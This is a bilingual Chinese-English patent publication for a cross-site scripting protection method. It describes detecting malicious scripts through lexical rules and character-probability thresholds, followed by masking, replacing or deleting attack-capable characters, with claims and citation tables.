本实施例通过在请求中设置访问标识和对代码进行词法组合的检测,基于该种方式进行标志不仅可以提高了访问脚本代码的识别效率,还提高了识别的精度,而对于存在恶意攻击的字符时,通过屏蔽、替换等方式使得外网访问请求失去攻击能力,从而达到跨站攻击防御的作用,提高系统的安全度和保障了网站的数据安全。In this embodiment, by setting the access identifier in the request and detecting the lexical combination of the code, marking based on this method not only improves the identification efficiency of the access script code, but also improves the accuracy of recognition, and for characters with malicious attacks At the same time, through shielding, replacement, etc., the external network access request loses the ability to attack, so as to achieve the role of cross-site attack defense, improve the security of the system and ensure the data security of the website.
本申请还提供一种计算机可读存储介质,其中,该计算机可读存储介质可以为易失性的,也可以为非易失性的,具体本申请不做限定。The present application also provides a computer-readable storage medium, where the computer-readable storage medium may be volatile or non-volatile, which is not specifically limited by the present application.
本实施例中,所述计算机可读存储介质上存储有跨站攻击防护程序,所述跨站攻击防护程序被处理器执行时实现如上述任一项实施例中所述的跨站攻击防护方法的步骤。其中,跨站攻击防护程序被处理器执行时所实现的方法可参照本申请跨站攻击防护方法的各个实施例,因此不再过多赘述。In this embodiment, a cross-site attack protection program is stored on the computer-readable storage medium, and the cross-site attack protection program is executed by a processor to implement the cross-site attack protection method described in any of the above embodiments A step of. Among them, the method implemented when the cross-site attack protection program is executed by the processor can refer to the various embodiments of the cross-site attack protection method of the present application, so the details are not repeated here.
基于上面结合附图对本申请的实施例进行了描述,但是本申请并不局限于上述的具体实施方式,上述的具体实施方式仅仅是示意性的,而不是限制性的,本领域的普通技术人员在本申请的启示下,在不脱离本申请宗旨和权利要求所保护的范围情况下,还可做出很多形式,凡是利用本申请说明书及附图内容所作的等效结构或等效流程变换,或直接或间接运用在其他相关的技术领域,这些均属于本申请的保护之内。The embodiments of the present application are described based on the above in conjunction with the accompanying drawings, but the present application is not limited to the above-mentioned specific embodiments. The above-mentioned specific embodiments are only illustrative and not restrictive. Those of ordinary skill in the art Under the enlightenment of this application, without departing from the purpose of this application and the scope of protection of the claims, many forms can be made. Any equivalent structure or equivalent process transformation made by using the content of the description and drawings of this application, Or directly or indirectly used in other related technical fields, these are all within the protection of this application.

Claims (20)

  1. 一种跨站攻击防护方法,所述跨站攻击防护方法包括以下步骤:A cross-site attack protection method, which includes the following steps:
    获取网络侧接收到的外网访问请求,所述外网访问请求为包含至少一个用于实现跨站数据访问的跨站访问脚本代码的集合;Acquiring an external network access request received by the network side, where the external network access request is a collection containing at least one cross-site access script code for implementing cross-site data access;
    根据预定义的词法组合规则,检测所述外网访问请求携带的跨站访问脚本代码中用于响应跨站访问的HTTP数据包中是否存在恶意程序,其中,所述词法组合规则为通过当前已知的恶意攻击程序分析得到的模型;According to a predefined lexical combination rule, detect whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request, where the lexical combination rule is to pass the current A model obtained by analyzing a known malicious attack program;
    若检测存在恶意程序,则检测所述跨站访问脚本代码中是否存在访问标识,其中,所述访问标识为基于预置的用户规则定义得到;If a malicious program is detected, detecting whether there is an access identifier in the cross-site access script code, where the access identifier is defined based on a preset user rule;
    若存在所述访问标识,则判断所述跨站访问脚本代码中是否存在具有攻击能力的字符;If the access identifier exists, it is determined whether there are characters with attack capability in the cross-site access script code;
    若所述跨站访问脚本代码中存在所述字符,则根据所述访问标识筛选出所述跨站访问脚本代码中具有攻击能力的字符,并对所述跨站访问脚本代码进行跨站脚本防御处理。If the character exists in the cross-site access script code, the characters with attack capabilities in the cross-site access script code are filtered out according to the access identifier, and cross-site scripting defense is performed on the cross-site access script code deal with.
  2. 如权利要求1所述的跨站攻击防护方法,所述根据预定义的词法组合规则,检测所述外网访问请求携带的跨站访问脚本代码中用于响应跨站访问的HTTP数据包中是否存在恶意程序的步骤包括:The cross-site attack protection method according to claim 1, said detecting whether there is an HTTP data packet used to respond to cross-site access in the cross-site access script code carried in the external network access request according to a predefined lexical combination rule The steps for the presence of malicious programs include:
    执行所述跨站访问脚本代码进行模拟运行,并捕获HTTP数据包在运行时每个访问页面上的活跃标签;Execute the cross-site access script code for simulation operation, and capture the active tags on each access page of the HTTP data packet during operation;
    计算所述活跃标签在所述跨站访问脚本代码中的标签概率的倒数,并将所述倒数相加求出算术平均值作为所述活跃标签的内嵌JavaScript合理指数;Calculate the inverse of the tag probability of the active tag in the cross-site access script code, and add the inverse numbers to obtain an arithmetic average as the embedded JavaScript reasonable index of the active tag;
    根据所述合理指数对所述跨站访问脚本代码进行归类;Classify the cross-site access script code according to the reasonable index;
    其中,所述活跃标签是与所述跨站访问脚本代码之间不存在其它活跃标签的标签,所述标签概率为所述活跃标签内直接出现在所述跨站访问脚本代码上的概率。Wherein, the active tag is a tag with no other active tags between the active tag and the cross-site access script code, and the tag probability is the probability of the active tag directly appearing on the cross-site access script code.
  3. 如权利要求2所述的跨站攻击防护方法,所述根据所述访问标识筛选出所述跨站访问脚本代码中具有攻击能力的字符,并对所述跨站访问脚本代码进行跨站脚本防御处理的步骤包括:3. The cross-site attack protection method according to claim 2, wherein the characters with attack capability in the cross-site access script code are filtered out according to the access identifier, and cross-site scripting defense is performed on the cross-site access script code The processing steps include:
    提取所述跨站访问脚本代码中的具有攻击能力的字符;Extracting attack-capable characters in the cross-site access script code;
    计算所述字符在所述外网访问请求中出现的字符概率;Calculating the character probability of the character appearing in the external network access request;
    比较所述字符概率与预设的信息泄密的概率等级之间的大小关系;Comparing the magnitude relationship between the character probability and the preset probability level of information leakage;
    若所述字符概率大于所述概率等级,则启动访问防护程序对所述访问请求进行跨站脚本防御处理。If the character probability is greater than the probability level, the access protection program is started to perform cross-site scripting defense processing on the access request.
  4. 如权利要求3所述的跨站攻击防护方法,所述计算所述字符在所述外网访问请求中出现的字符概率包括:8. The cross-site attack protection method according to claim 3, wherein the calculating the character probability of the character appearing in the external network access request comprises:
    调取所述网络侧中出现跨站攻击的所有历史访问记录,并统计所有所述历史访问记录的跨站访问脚本代码的总数量;Retrieve all historical access records of cross-site attacks on the network side, and count the total number of cross-site access script codes of all historical access records;
    统计所述字符在所述所有历史访问记录中的出现次数;Counting the number of occurrences of the character in all the historical visit records;
    根据所述出现次数和所述总数量,计算出所述字符在所述外网访问请求中出现的字符概率。According to the number of occurrences and the total number, the probability of the character appearing in the external network access request is calculated.
  5. 如权利要求4所述的跨站攻击防护方法,所述根据所述出现次数和所述总数量,计算出所述字符在所述外网访问请求中出现的字符概率包括:8. The cross-site attack protection method according to claim 4, wherein the calculation of the character probability of the character in the external network access request based on the number of appearances and the total number comprises:
    将所述出现次数除以所述总数量,得到一个百分比值;Divide the number of occurrences by the total number to obtain a percentage value;
    将所述百分比值乘以一个权重系数,得到最终的字符概率,其计算公式如下:Multiply the percentage value by a weight coefficient to obtain the final character probability. The calculation formula is as follows:
    Figure PCTCN2019119113-appb-100001
    Figure PCTCN2019119113-appb-100001
    其中,P为具有攻击能力的字符出现的字符概率,m为所述出现次数,M为所述跨站访问脚本代码的总数量,α为权重系数。Wherein, P is the probability of the appearance of characters with attack capability, m is the number of occurrences, M is the total number of cross-site access script codes, and α is the weight coefficient.
  6. 如权利要求3所述的跨站攻击防护方法,所述概率等级包括攻击程度从低到高的三个等级,所述对所述跨站访问脚本代码进行跨站脚本防御处理包括:8. The cross-site attack protection method according to claim 3, wherein the probability levels include three levels from low to high attack levels, and performing cross-site scripting defense processing on the cross-site access script code includes:
    若所述字符概率大于第一概率等级且小于第二概率等级,则对所述跨站访问脚本代码中对应的字符或者整个代码进行屏蔽处理;If the character probability is greater than the first probability level and less than the second probability level, perform shielding processing on the corresponding character or the entire code in the cross-site access script code;
    若所述字符概率大于第二概率等级且小于第三概率等级,则对所述跨站访问脚本代码中的字符或者整个代码进行替换处理;If the character probability is greater than the second probability level and less than the third probability level, replace the characters or the entire code in the cross-site access script code;
    若所述字符概率大于第三概率等级,则将所述跨站访问脚本代码从所述外网访问请求中删除。If the character probability is greater than the third probability level, the cross-site access script code is deleted from the external network access request.
  7. 如权利要求6所述的跨站攻击防护方法,所述对所述跨站访问脚本代码进行跨站脚本防御处理还包括:7. The cross-site attack protection method according to claim 6, wherein said performing cross-site scripting defense processing on said cross-site access script code further comprises:
    若所述字符概率大于第三概率等级,则对所述跨站访问脚本代码进行功能性评估,确定所述跨站访问脚本代码在所述外网访问请求中是否为必须的功能访问代码;If the character probability is greater than the third probability level, perform functional evaluation on the cross-site access script code to determine whether the cross-site access script code is a necessary function access code in the external network access request;
    若是,则保留所述跨站访问脚本代码在所述外网访问请求中,并将所述具有攻击能力的字符替换为预设的安全字符,所述安全字符为仅实现代码位数填充作用的符号。If yes, keep the cross-site access script code in the extranet access request, and replace the attack-capable character with a preset security character, the security character only realizes the code digit filling function symbol.
  8. 一种跨站攻击防护装置,所述跨站攻击防护装置包括:A cross-site attack protection device, which includes:
    获取模块,用于获取网络侧接收到的外网访问请求,所述外网访问请求为包含至少一个用于实现跨站数据访问的跨站访问脚本代码的集合;The obtaining module is used to obtain the external network access request received by the network side, the external network access request is a collection containing at least one cross-site access script code for implementing cross-site data access;
    检测模块,用于根据预定义的词法组合规则,检测所述外网访问请求携带的跨站访问脚本代码中用于响应跨站访问的HTTP数据包中是否存在恶意程序,其中,所述词法组合规则为通过当前已知的恶意攻击程序分析得到的模型;以及用于在检测存在恶意程序时,检测所述跨站访问脚本代码中是否存在访问标识,其中,所述访问标识为基于预置的用户规则定义得到;The detection module is configured to detect whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request according to the predefined lexical combination rule, wherein the lexical combination The rule is a model obtained through analysis of currently known malicious attack programs; and is used to detect whether there is an access identifier in the cross-site access script code when a malicious program is detected, wherein the access identifier is based on a preset User rules are defined;
    判断模块,用于若存在所述访问标识,则判断所述跨站访问脚本代码中是否存在具有攻击能力的字符;A judging module, for judging whether there are characters with attack capabilities in the cross-site access script code if the access identifier exists;
    防御处理模块,用于若所述跨站访问脚本代码中存在所述字符,则根据所述访问标识筛选出所述跨站访问脚本代码中具有攻击能力的字符,并对所述跨站访问脚本代码进行跨站脚本防御处理。The defense processing module is configured to, if the character exists in the cross-site access script code, filter out the characters with attack capability in the cross-site access script code according to the access identifier, and check the cross-site access script The code performs cross-site scripting defense processing.
  9. 如权利要求8所述的跨站攻击防护装置,所述检测模块包括模拟运行单元、计算单元和归类单元;8. The cross-site attack protection device according to claim 8, wherein the detection module includes a simulation operation unit, a calculation unit and a classification unit;
    所述模拟运行单元,用于执行所述跨站访问脚本代码进行模拟运行,并捕获HTTP数据包在运行时每个访问页面上的活跃标签;The simulation running unit is configured to execute the cross-site access script code for simulation operation, and capture the active label on each access page of the HTTP data packet during runtime;
    所述计算单元,用于计算所述活跃标签在所述跨站访问脚本代码中的标签概率的倒数,并将所述倒数相加求出算术平均值作为所述活跃标签的内嵌JavaScript合理指数;The calculation unit is configured to calculate the reciprocal of the tag probability of the active tag in the cross-site access script code, and add the reciprocal to obtain an arithmetic average as the embedded JavaScript reasonable index of the active tag ;
    归类单元,用于根据所述合理指数对所述跨站访问脚本代码进行归类;The classification unit is configured to classify the cross-site access script code according to the reasonable index;
    其中,所述活跃标签是与所述跨站访问脚本代码之间不存在其它活跃标签的标签,所述标签概率为所述活跃标签内直接出现在所述跨站访问脚本代码上的概率。Wherein, the active tag is a tag with no other active tags between the active tag and the cross-site access script code, and the tag probability is the probability of the active tag directly appearing on the cross-site access script code.
  10. 如权利要求9所述的跨站攻击防护装置,所述防御处理模块包括提取单元、概率计算单元、比较单元和防护单元;9. The cross-site attack protection device according to claim 9, wherein the defense processing module includes an extraction unit, a probability calculation unit, a comparison unit, and a protection unit;
    所述提取单元,用于提取所述跨站访问脚本代码中的具有攻击能力的字符;The extraction unit is configured to extract characters with attack capabilities in the cross-site access script code;
    所述概率计算单元,用于计算所述字符在所述外网访问请求中出现的字符概率;The probability calculation unit is configured to calculate the character probability of the character appearing in the external network access request;
    所述比较单元,用于比较所述字符概率与预设的信息泄密的概率等级之间的大小关系;The comparison unit is configured to compare the magnitude relationship between the character probability and the preset probability level of information leakage;
    所述防护单元,用于在所述字符概率大于所述概率等级时,启动访问防护程序对所述访问请求进行跨站脚本防御处理。The protection unit is configured to start an access protection program to perform cross-site scripting defense processing on the access request when the character probability is greater than the probability level.
  11. 如权利要求10所述的跨站攻击防护装置,所述概率计算单元用于:The cross-site attack protection device according to claim 10, wherein the probability calculation unit is used for:
    调取所述网络侧中出现跨站攻击的所有历史访问记录,并统计所有所述历史访问记录的跨站访问脚本代码的总数量;统计所述字符在所述所有历史访问记录中的出现次数;根据所述出现次数和所述总数量,计算出所述字符在所述外网访问请求中出现的字符概率。Retrieve all historical access records of cross-site attacks on the network side, and count the total number of cross-site access script codes of all historical access records; count the number of occurrences of the character in all historical access records ; According to the number of occurrences and the total number, the probability of the character appearing in the external network access request is calculated.
  12. 如权利要求11所述的跨站攻击防护装置,所述概率计算单元还用于:The cross-site attack protection device according to claim 11, wherein the probability calculation unit is further configured to:
    将所述出现次数除以所述总数量,得到一个百分比值;将所述百分比值乘以一个权重系数,得到最终的字符概率,其计算公式如下:Divide the number of occurrences by the total number to obtain a percentage value; multiply the percentage value by a weight coefficient to obtain the final character probability. The calculation formula is as follows:
    Figure PCTCN2019119113-appb-100002
    Figure PCTCN2019119113-appb-100002
    其中,P为具有攻击能力的字符出现的概率,m为所述出现次数,M为所述跨站访问脚本代码的总数量,α为权重系数。Where, P is the probability of occurrence of characters with attack capability, m is the number of occurrences, M is the total number of cross-site access script codes, and α is the weight coefficient.
  13. 如权利要求10所述的跨站攻击防护装置,所述概率等级包括攻击程度从低到高的三个等级,所述防御单元用于:The cross-site attack protection device according to claim 10, wherein the probability level includes three levels from low to high attack degree, and the defense unit is used for:
    在所述字符概率大于第一概率等级且小于第二概率等级时,对所述跨站访问脚本代码中对应的字符或者整个代码进行屏蔽处理;When the character probability is greater than the first probability level and less than the second probability level, perform shielding processing on the corresponding character or the entire code in the cross-site access script code;
    在所述字符概率大于第二概率等级且小于第三概率等级时,对所述跨站访问脚本代码中的字符或者整个代码进行替换处理;When the character probability is greater than the second probability level and less than the third probability level, replace the character or the entire code in the cross-site access script code;
    在所述字符概率大于第三概率等级时,将所述跨站访问脚本代码从所述外网访问请求中删除。When the character probability is greater than the third probability level, the cross-site access script code is deleted from the external network access request.
  14. 如权利要求13所述的跨站攻击防护装置,所述跨站攻击防护装置还 包括:The cross-site attack protection device of claim 13, wherein the cross-site attack protection device further comprises:
    评估模块,用于在所述字符概率大于第三概率等级之后,对所述跨站访问脚本代码进行功能性评估,确定所述跨站访问脚本代码在所述外网访问请求中是否为必须的功能访问代码;若是,则保留所述跨站访问脚本代码在所述外网访问请求中,并将所述具有攻击能力的字符替换为预设的安全字符,所述安全字符为仅实现代码位数填充作用的符号。The evaluation module is configured to perform a functional evaluation of the cross-site access script code after the character probability is greater than the third probability level, and determine whether the cross-site access script code is necessary in the external network access request Function access code; if it is, keep the cross-site access script code in the extranet access request, and replace the attack-capable characters with preset security characters, which are only implementation code bits Symbol for number filling.
  15. 一种跨站法攻击防护设备,所述跨站攻击防护设备包括存储器、处理器以及存储在所述存储器上并可在所述处理器上运行的跨站攻击防护程序,所述跨站攻击防护程序被所述处理器执行时实现如下所述的跨站攻击防护方法的步骤:A cross-site attack protection device, which includes a memory, a processor, and a cross-site attack protection program stored on the memory and running on the processor, the cross-site attack protection When the program is executed by the processor, the steps of the cross-site attack protection method described below are implemented:
    获取网络侧接收到的外网访问请求,所述外网访问请求为包含至少一个用于实现跨站数据访问的跨站访问脚本代码的集合;Acquiring an external network access request received by the network side, where the external network access request is a collection containing at least one cross-site access script code for implementing cross-site data access;
    根据预定义的词法组合规则,检测所述外网访问请求携带的跨站访问脚本代码中用于响应跨站访问的HTTP数据包中是否存在恶意程序,其中,所述词法组合规则为通过当前已知的恶意攻击程序分析得到的模型;According to a predefined lexical combination rule, detect whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request, where the lexical combination rule is to pass the current A model obtained by analyzing a known malicious attack program;
    若检测存在恶意程序,则检测所述跨站访问脚本代码中是否存在访问标识,其中,所述访问标识为基于预置的用户规则定义得到;If a malicious program is detected, detecting whether there is an access identifier in the cross-site access script code, where the access identifier is defined based on a preset user rule;
    若存在所述访问标识,则判断所述跨站访问脚本代码中是否存在具有攻击能力的字符;If the access identifier exists, it is determined whether there are characters with attack capability in the cross-site access script code;
    若所述跨站访问脚本代码中存在所述字符,则根据所述访问标识筛选出所述跨站访问脚本代码中具有攻击能力的字符,并对所述跨站访问脚本代码进行跨站脚本防御处理。If the character exists in the cross-site access script code, the characters with attack capabilities in the cross-site access script code are filtered out according to the access identifier, and cross-site scripting defense is performed on the cross-site access script code deal with.
  16. 如权利要求15所述的跨站法攻击防护设备,所述跨站法攻击防护程序被所述处理器执行实现所述根据预定义的词法组合规则,检测所述外网访问请求携带的跨站访问脚本代码中用于响应跨站访问的HTTP数据包中是否存在恶意程序的步骤时,还包括以下步骤:The cross-site attack protection device according to claim 15, wherein the cross-site attack protection program is executed by the processor to realize the detection of the cross-site carried in the external network access request according to the predefined lexical combination rule When accessing the steps in the script code for responding to whether there is a malicious program in the HTTP data packet for cross-site access, the following steps are also included:
    执行所述跨站访问脚本代码进行模拟运行,并捕获HTTP数据包在运行时每个访问页面上的活跃标签;Execute the cross-site access script code for simulation operation, and capture the active tags on each access page of the HTTP data packet during operation;
    计算所述活跃标签在所述跨站访问脚本代码中的标签概率的倒数,并将所述倒数相加求出算术平均值作为所述活跃标签的内嵌JavaScript合理指数;Calculate the inverse of the tag probability of the active tag in the cross-site access script code, and add the inverse numbers to obtain an arithmetic average as the embedded JavaScript reasonable index of the active tag;
    根据所述合理指数对所述跨站访问脚本代码进行归类;Classify the cross-site access script code according to the reasonable index;
    其中,所述活跃标签是与所述跨站访问脚本代码之间不存在其它活跃标签的标签,所述标签概率为所述活跃标签内直接出现在所述跨站访问脚本代码上的概率。Wherein, the active tag is a tag with no other active tags between the active tag and the cross-site access script code, and the tag probability is the probability of the active tag directly appearing on the cross-site access script code.
  17. 如权利要求16所述的跨站法攻击防护设备,所述跨站法攻击防护程序被所述处理器执行实现所述根据所述访问标识筛选出所述跨站访问脚本代码中具有攻击能力的字符,并对所述跨站访问脚本代码进行跨站脚本防御处理的步骤时,还包括以下步骤:The cross-site attack protection device according to claim 16, wherein the cross-site attack protection program is executed by the processor to realize the screening out of the cross-site access script codes with attack capabilities according to the access identifier Characters, and the steps of performing cross-site scripting defense processing on the cross-site access script code include the following steps:
    提取所述跨站访问脚本代码中的具有攻击能力的字符;Extracting attack-capable characters in the cross-site access script code;
    计算所述字符在所述外网访问请求中出现的字符概率;Calculating the character probability of the character appearing in the external network access request;
    比较所述字符概率与预设的信息泄密的概率等级之间的大小关系;Comparing the magnitude relationship between the character probability and the preset probability level of information leakage;
    若所述字符概率大于所述概率等级,则启动访问防护程序对所述访问请求进行跨站脚本防御处理。If the character probability is greater than the probability level, the access protection program is started to perform cross-site scripting defense processing on the access request.
  18. 一种计算机可读存储介质,所述计算机可读存储介质上存储有跨站攻击防护程序,所述跨站攻击防护程序被处理器执行时实现如下所述的跨站攻击防护方法的步骤:A computer-readable storage medium having a cross-site attack protection program stored on the computer-readable storage medium, and when the cross-site attack protection program is executed by a processor, the steps of the cross-site attack protection method described below are implemented:
    获取网络侧接收到的外网访问请求,所述外网访问请求为包含至少一个用于实现跨站数据访问的跨站访问脚本代码的集合;Acquiring an external network access request received by the network side, where the external network access request is a collection containing at least one cross-site access script code for implementing cross-site data access;
    根据预定义的词法组合规则,检测所述外网访问请求携带的跨站访问脚本代码中用于响应跨站访问的HTTP数据包中是否存在恶意程序,其中,所述词法组合规则为通过当前已知的恶意攻击程序分析得到的模型;According to a predefined lexical combination rule, detect whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request, where the lexical combination rule is to pass the current A model obtained by analyzing a known malicious attack program;
    若检测存在恶意程序,则检测所述跨站访问脚本代码中是否存在访问标识,其中,所述访问标识为基于预置的用户规则定义得到;If a malicious program is detected, detecting whether there is an access identifier in the cross-site access script code, where the access identifier is defined based on a preset user rule;
    若存在所述访问标识,则判断所述跨站访问脚本代码中是否存在具有攻击能力的字符;If the access identifier exists, it is determined whether there are characters with attack capability in the cross-site access script code;
    若所述跨站访问脚本代码中存在所述字符,则根据所述访问标识筛选出所述跨站访问脚本代码中具有攻击能力的字符,并对所述跨站访问脚本代码进行跨站脚本防御处理。If the character exists in the cross-site access script code, the characters with attack capabilities in the cross-site access script code are filtered out according to the access identifier, and cross-site scripting defense is performed on the cross-site access script code deal with.
  19. 如权利要求18所述的计算机可读存储介质,所述跨站攻击防护程序被处理器执行实现所述根据预定义的词法组合规则,检测所述外网访问请求 携带的跨站访问脚本代码中用于响应跨站访问的HTTP数据包中是否存在恶意程序的步骤时,还包括以下步骤:The computer-readable storage medium of claim 18, wherein the cross-site attack protection program is executed by a processor to realize the detection of the cross-site access script code carried in the external network access request according to a predefined lexical combination rule The steps used to respond to the presence of malicious programs in the HTTP data packets of cross-site access include the following steps:
    执行所述跨站访问脚本代码进行模拟运行,并捕获HTTP数据包在运行时每个访问页面上的活跃标签;Execute the cross-site access script code for simulation operation, and capture the active tags on each access page of the HTTP data packet during operation;
    计算所述活跃标签在所述跨站访问脚本代码中的标签概率的倒数,并将所述倒数相加求出算术平均值作为所述活跃标签的内嵌JavaScript合理指数;Calculate the inverse of the tag probability of the active tag in the cross-site access script code, and add the inverse numbers to obtain an arithmetic average as the embedded JavaScript reasonable index of the active tag;
    根据所述合理指数对所述跨站访问脚本代码进行归类;Classify the cross-site access script code according to the reasonable index;
    其中,所述活跃标签是与所述跨站访问脚本代码之间不存在其它活跃标签的标签,所述标签概率为所述活跃标签内直接出现在所述跨站访问脚本代码上的概率。Wherein, the active tag is a tag with no other active tags between the active tag and the cross-site access script code, and the tag probability is the probability of the active tag directly appearing on the cross-site access script code.
  20. 如权利要求19所述的计算机可读存储介质,所述跨站法攻击防护程序被所述处理器执行实现所述根据所述访问标识筛选出所述跨站访问脚本代码中具有攻击能力的字符,并对所述跨站访问脚本代码进行跨站脚本防御处理的步骤时,还包括以下步骤:The computer-readable storage medium of claim 19, wherein the cross-site attack protection program is executed by the processor to realize the screening of characters with attack capabilities in the cross-site access script code according to the access identifier , And the steps of performing cross-site scripting defense processing on the cross-site access script code include the following steps:
    提取所述跨站访问脚本代码中的具有攻击能力的字符;Extracting attack-capable characters in the cross-site access script code;
    计算所述字符在所述外网访问请求中出现的字符概率;Calculating the character probability of the character appearing in the external network access request;
    比较所述字符概率与预设的信息泄密的概率等级之间的大小关系;Comparing the magnitude relationship between the character probability and the preset probability level of information leakage;
    若所述字符概率大于所述概率等级,则启动访问防护程序对所述访问请求进行跨站脚本防御处理。If the character probability is greater than the probability level, the access protection program is started to perform cross-site scripting defense processing on the access request.
PCT/CN2019/119113 2019-08-01 2019-11-18 Cross-site scripting attack protection method and apparatus, device and storage medium WO2021017318A1 (en)

Applications Claiming Priority (2)

Application Number Priority Date Filing Date Title
CN201910706703.9 2019-08-01
CN201910706703.9A CN110650117B (en) 2019-08-01 2019-08-01 Cross-site attack protection method, device, equipment and storage medium

Publications (1)

Publication Number Publication Date
WO2021017318A1 true WO2021017318A1 (en) 2021-02-04

Family

ID=68989850

Family Applications (1)

Application Number Title Priority Date Filing Date
PCT/CN2019/119113 WO2021017318A1 (en) 2019-08-01 2019-11-18 Cross-site scripting attack protection method and apparatus, device and storage medium

Country Status (2)

Country Link
CN (1) CN110650117B (en)
WO (1) WO2021017318A1 (en)

Cited By (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN113329026A (en) * 2021-06-08 2021-08-31 中国传媒大学 Attack capability determination method and system based on network target range vulnerability drilling
CN114257522A (en) * 2021-12-21 2022-03-29 浙江国利网安科技有限公司 Network security attack and defense demonstration system, method, device and storage medium
CN115617879A (en) * 2022-11-23 2023-01-17 中国电子信息产业集团有限公司 Data source management method of data element and corresponding system

Families Citing this family (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN111259398B (en) * 2020-02-25 2022-11-22 深信服科技股份有限公司 Virus defense method, device, equipment and readable storage medium
CN112671741B (en) * 2020-12-16 2022-10-18 平安普惠企业管理有限公司 Network protection method, device, terminal and storage medium
CN113065132B (en) * 2021-03-25 2023-11-03 深信服科技股份有限公司 Method and device for detecting confusion of macro program, electronic equipment and storage medium
CN113810418B (en) * 2021-09-18 2023-12-26 土巴兔集团股份有限公司 Method for defending cross-site scripting attack and related equipment thereof

Citations (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101901221A (en) * 2009-05-27 2010-12-01 北京启明星辰信息技术股份有限公司 Method and device for detecting cross site scripting
US20120023395A1 (en) * 2010-07-22 2012-01-26 International Business Machines Corporation Method and apparatus for dynamic content marking to facilitate context-aware output escaping
CN102833269A (en) * 2012-09-18 2012-12-19 苏州山石网络有限公司 Detection method and device for cross site scripting and firewall with device
CN104601540A (en) * 2014-12-05 2015-05-06 华为技术有限公司 Cross-site scripting (XSS) attack defense method and Web server
CN106354632A (en) * 2016-08-24 2017-01-25 北京奇虎测腾科技有限公司 Source code detecting system and method based on static analysis technology

Family Cites Families (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US8024804B2 (en) * 2006-03-08 2011-09-20 Imperva, Inc. Correlation engine for detecting network attacks and detection method
US8578482B1 (en) * 2008-01-11 2013-11-05 Trend Micro Inc. Cross-site script detection and prevention
CN104519008B (en) * 2013-09-26 2018-05-15 北大方正集团有限公司 Cross-site scripting attack defence method and device, application server
CN106506548A (en) * 2016-12-23 2017-03-15 努比亚技术有限公司 The defence installation of cross-site scripting attack and method
CN109040097A (en) * 2018-08-23 2018-12-18 彩讯科技股份有限公司 A kind of defence method of cross-site scripting attack, device, equipment and storage medium
CN109257393A (en) * 2018-12-05 2019-01-22 四川长虹电器股份有限公司 XSS attack defence method and device based on machine learning

Patent Citations (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101901221A (en) * 2009-05-27 2010-12-01 北京启明星辰信息技术股份有限公司 Method and device for detecting cross site scripting
US20120023395A1 (en) * 2010-07-22 2012-01-26 International Business Machines Corporation Method and apparatus for dynamic content marking to facilitate context-aware output escaping
CN102833269A (en) * 2012-09-18 2012-12-19 苏州山石网络有限公司 Detection method and device for cross site scripting and firewall with device
CN104601540A (en) * 2014-12-05 2015-05-06 华为技术有限公司 Cross-site scripting (XSS) attack defense method and Web server
CN106354632A (en) * 2016-08-24 2017-01-25 北京奇虎测腾科技有限公司 Source code detecting system and method based on static analysis technology

Cited By (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN113329026A (en) * 2021-06-08 2021-08-31 中国传媒大学 Attack capability determination method and system based on network target range vulnerability drilling
CN113329026B (en) * 2021-06-08 2022-09-16 中国传媒大学 Attack capability determination method and system based on network target range vulnerability drilling
CN114257522A (en) * 2021-12-21 2022-03-29 浙江国利网安科技有限公司 Network security attack and defense demonstration system, method, device and storage medium
CN114257522B (en) * 2021-12-21 2024-01-12 浙江国利网安科技有限公司 Network security attack and defense demonstration system, method, device and storage medium
CN115617879A (en) * 2022-11-23 2023-01-17 中国电子信息产业集团有限公司 Data source management method of data element and corresponding system
CN115617879B (en) * 2022-11-23 2023-04-07 中国电子信息产业集团有限公司 Data source management method of data element and corresponding system

Also Published As

Publication number Publication date
CN110650117B (en) 2022-03-25
CN110650117A (en) 2020-01-03

Similar Documents

Publication Publication Date Title
WO2021017318A1 (en) Cross-site scripting attack protection method and apparatus, device and storage medium
US10902117B1 (en) Framework for classifying an object as malicious with machine learning for deploying updated predictive models
US10872151B1 (en) System and method for triggering analysis of an object for malware in response to modification of that object
US10430586B1 (en) Methods of identifying heap spray attacks using memory anomaly detection
CN109831465B (en) Website intrusion detection method based on big data log analysis
EP3113064B1 (en) System and method for determining modified web pages
US11188650B2 (en) Detection of malware using feature hashing
US11122061B2 (en) Method and server for determining malicious files in network traffic
Khan et al. Defending malicious script attacks using machine learning classifiers
KR101811325B1 (en) Detection of malicious scripting language code in a network environment
US9954889B2 (en) Method and system for malicious code detection
US8201244B2 (en) Automated malware signature generation
Liu et al. A novel approach for detecting browser-based silent miner
Song et al. Advanced evasion attacks and mitigations on practical ML‐based phishing website classifiers
US10009370B1 (en) Detection and remediation of potentially malicious files
KR100745044B1 (en) Apparatus and method for protecting access of phishing site
WO2018076697A1 (en) Method and apparatus for detecting zombie feature
CN111628990A (en) Attack recognition method and device and server
CN116860489A (en) System and method for threat risk scoring of security threats
EP2977928B1 (en) Malicious code detection
CN113190839A (en) Web attack protection method and system based on SQL injection
CN113067792A (en) XSS attack identification method, device, equipment and medium
CN109067716B (en) Method and system for identifying dark chain
CN107844702B (en) Website trojan backdoor detection method and device based on cloud protection environment
CN109495482A (en) A kind of network data information safe transmission method

Legal Events

Date Code Title Description
121 Ep: the epo has been informed by wipo that ep was designated in this application

Ref document number: 19939825

Country of ref document: EP

Kind code of ref document: A1

NENP Non-entry into the national phase

Ref country code: DE

122 Ep: pct application non-entry in european phase

Ref document number: 19939825

Country of ref document: EP

Kind code of ref document: A1